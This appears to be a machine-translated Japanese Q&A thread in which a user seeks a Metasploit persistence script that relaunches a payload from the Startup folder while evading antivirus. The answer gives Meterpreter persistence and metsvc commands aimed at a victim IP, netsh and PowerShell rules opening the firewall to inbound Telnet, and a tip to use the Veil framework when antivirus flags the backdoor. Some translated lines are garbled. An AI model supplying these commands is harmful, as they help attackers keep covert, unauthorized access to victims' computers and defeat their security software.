Metasploit 用の単純な永続化スクリプトを設計しようとしています。これは、ウイルス対策によってタグ付けされているものを考慮しています。コードがどのように見えるべきかについて、いくつかの問題が発生しています。これが私の計画です: 1. ループ機能を備えたスタートアップ フォルダー内のバッチ ファイル 2. 上記のバッチ ファイルは tasklist コマンドを実行し、実行中のプロセスでファイルの名前を検索します 3. 実行中のプロセスが見つかった場合は何もしません 4.プロセスが実行されているのを認識せず、単純に再起動します。非常にシンプルな設計ですが、コードを書いているときに問題が発生します。私の質問は次のとおりです。このアイデアをコマンドに書き込むにはどうすればよいですか? アイデアは、if ステートメントが tasklist コマンドにどのように影響するかということです。そのため、名前に基づいてプロセスが実行されているかどうかを確認するには、tasklist コマンドをフィルター処理する必要があります。
質問する
310 次
1 に答える
0
Metasploit には、デフォルトの補助モジュールが付属しています。あなたのシナリオでは、executeで作業できます
run metsvcメーター以上。また
run persistence -U -i <interactive seconds > -p portnumber -r victimip
を使用してルールを作成することもできますnetsh
netsh advfirewall firewall add rule name="Allow Inbound Telnet" dir=in program= %SystemRoot%\System32\tlntsvr.exe remoteip=localsubnet action=allow
Powershell の使用
New-NetFirewallRule -DisplayName “Allow Inbound Telnet” -Direction Inbound -Program %SystemRoot%\System32\tlntsvr.exe -RemoteAddress LocalSubnet -Action Allow
AV がバックドアを検出している場合は、ベール フレームワークを使用してください
于 2015-06-09T05:51:59.760 に答える